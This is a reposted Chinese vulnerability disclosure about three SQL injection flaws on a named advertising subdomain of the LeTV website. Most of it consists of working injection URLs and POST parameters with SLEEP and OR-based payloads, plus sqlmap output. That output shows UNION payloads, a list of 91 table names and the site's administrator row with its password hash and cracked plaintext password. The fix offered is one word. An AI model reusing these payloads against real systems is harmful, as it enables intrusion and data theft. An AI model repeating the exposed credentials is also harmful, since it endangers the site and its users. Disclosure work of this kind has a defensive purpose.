欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

乐视网某站SQL注入3枚

程序员文章站 2022-07-07 22:38:24
乐视网某站sql注入一枚 http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph&name=1&text=%...

乐视网某站sql注入一枚

http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph&name=1&text=%3Cinput+%2F%3E&pic=0&callback=jQuery17105813498379171187_1464161411962&_=1464161422761

几乎每个参数都有注入:

http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph' or left(user(),16)='[email protected]' and sleep(3) and '1'='1&name=1&text=%3Cinput+%2F%3E&pic=0&callback=jQuery17105813498379171187_1464161411962&_=1464161422761

请求出现延迟,用户名为:

[email protected]

http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph' or left(database(),2)='ad' and sleep(3) and '1'='1&name=1&text=%3Cinput+%2F%3E&pic=0&callback=jQuery17105813498379171187_1464161411962&_=1464161422761

数据库为ad

post请求:

http://ad.hz.letv.com/benzc-class/php/jieda_list.php

参数:

province=1

http://ad.hz.letv.com/benzc-class/php/jieda_list.php

province=1' or '1'='2

返回空

province=1' or '1'='1

返回所有数据

另一处:

post:

http://ad.hz.letv.com/benzc-class/php/jieda_data.php

参数:

jjsonpcallback=jQuery220023386403540783274_1464161522072?province=%E5%8C%97%E4%BA%AC&city=%E5%8C%97%E4%BA%AC&name=%E6%B5%8B%E8%AF%95&daqu=%E6%97%A0&mobile=13800138000' or 1=1 and sleep(4) and '1'='1&sex=0&email=%E6%97%A0&interested=%E6%97%A0&memo2=http%3A%2F%2Fad.hz.letv.com%2Ftest%2Fbenzc%2Findex.html&buyCarTime=%E6%97%A0&jxsdm=%E6%97%A0&memo1=benzc&jxsname=%E5%8C%97%E4%BA%AC%E6%B3%A2%E5%A3%AB%E9%80%9A%E8%BE%BE%E6%B1%BD%E8%BD%A6%E9%94%80%E5%94%AE%E6%9C%8D%E5%8A%A1%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8

参数mobile存在注入,or 1=1请求延迟,or 1=2请求不延迟

available databases [2]:

[*] ad

[*] information_schema

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: #1* ((custom) POST)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: province=1' AND (SELECT * FROM (SELECT(SLEEP(5)))xQWX) AND 'AKoZ'='AKoZ

Type: UNION query

Title: Generic UNION query (NULL) - 1 column

Payload: province=1' UNION ALL SELECT CONCAT(0x717a707871,0x4364574254444b78464a6c7a687a744b53664370565654464e78797272684f4b4b7149516b615766,0x7176706271)-- -

---

web application technology: PHP 5.3.19

back-end DBMS: MySQL >= 5.0.0

Database: ad

[91 tables]

+-----------------------------+

| BAM_data |

| CAMRY_data |

| CAMRY_list |

| UserName_data |

| 'Dealer List$'_xlnm#Extract |

| Dealer List |

| a30_people |

| ad_car |

| ad_madinglin_shareNum |

| ad_page_pv_num |

| ad_record |

| ad_voteinfo |

| ad_voterecord |

| ad_wph_cmt |

| ad_wph_online_time |

| ad_wph_tel |

| add_jieqidata |

| audi_2015_list |

| audi_list |

| audi_list_bak |

| audi_list_bak1 |

| audi_list_bak2 |

| audi_list_bak3 |

| baolai_data |

| baolai_list |

| baoshan_user_data |

| baoshan_vip_card |

| baoshan_vip_week |

| benzc_data |

| benzc_list |

| changan_data |

| changan_list |

| createTab |

| diluerweimaData |

| fiesta_car |

| fiesta_list |

| fute_car |

| fute_ld |

| fute_list |

| game_kp_bianhao |

| game_kp_jpk |

| game_kp_user |

| game_yao_info |

| game_yao_jianhao |

| golf_contact |

| golf_data |

| golf_jialv_data |

| golf_jialv_list |

| golf_list |

| golf_people |

| hailan_data |

| hailan_list |

| highlander_data |

| highlander_list |

| hn_list |

| hn_record |

| infiniti_info |

| infiniti_user |

| jieda_data |

| jieda_data_bak_20150504 |

| jieda_list |

| jieda_list_yuan |

| jieda_list_yuan2 |

| jys50_yuyue |

| kadjar_data |

| kadjar_list |

| lingmu_data |

| lingmu_list |

| linmu_list_city |

| meten_phone |

| olay_record |

| olay_vote |

| op_admin_user |

| op_books |

| op_lottery_sys |

| op_signup |

| op_winner_list |

| sj_prize |

| sj_userlist |

| tp_tab |

| tp_tab_ip |

| tz18_jianId |

| tz18_user |

| vezel_contact |

| vezel_people |

| wph_yaoqinma |

| wutaigroup_cont |

| y_prize |

| y_users |

| yifu_list |

| yili |

+-----------------------------+

Table: op_admin_user

[1 entry]

+-----+----------+----------+--------------------------------------------+---------------+

| uid | username | realname | password | lastlogintime |

+-----+----------+----------+--------------------------------------------+---------------+

| 1 | admin | oppo | 408c06609ccabfc09e76f1807156d01c (abc_123) | 1458288536 |

+-----+----------+----------+--------------------------------------------+---------------+

管理员弱口令,打屁屁

解决方案:

过滤